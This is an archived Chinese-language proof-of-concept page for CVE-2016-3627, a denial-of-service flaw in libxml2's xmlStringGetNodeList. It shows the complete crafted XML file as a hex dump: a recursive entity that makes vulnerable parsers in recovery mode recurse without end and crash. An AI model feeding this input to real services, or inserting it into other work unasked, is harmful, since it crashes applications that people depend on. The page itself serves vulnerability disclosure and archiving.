POC详情: d39650341d41b594ededec4958916b616e727d2b

来源
关联漏洞
标题: Libxml2 拒绝服务漏洞 (CVE-2016-3627)
描述:Libxml2是GNOME项目组所研发的一个基于C语言的用来解析XML文档的函数库,它支持多种编码格式、Xpath解析、Well-formed和valid验证等。 libxml2 2.9.3及之前版本的tree.c文件中的‘xmlStringGetNodeList’函数存在安全漏洞。当程序工作在恢复模式时,攻击者可借助特制的XML文档利用该漏洞造成拒绝服务(无限递归,栈损坏和应用程序崩溃)。
描述
PoC of CVE-2016-3627
介绍
# [CVE-2016-3627](https://www.cve.org/CVERecord?id=CVE-2016-3627)

```shell
> xxd CVE-2016-3627.xml
00000000: 3c21 444f 4354 5950 455b 3c21 454e 5449  <!DOCTYPE[<!ENTI
00000010: 5459 594e 2726 594e 3b27 3e3c 2145 4e54  TYYN'&YN;'><!ENT
00000020: 4954 5968 3e30 3cef bfbd 2053 3d22 2659  ITYh>0<... S="&Y
00000030: 4e3b                                     N;
```
文件快照

[4.0K] /data/pocs/d39650341d41b594ededec4958916b616e727d2b ├── [ 50] CVE-2016-3627.xml └── [ 362] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。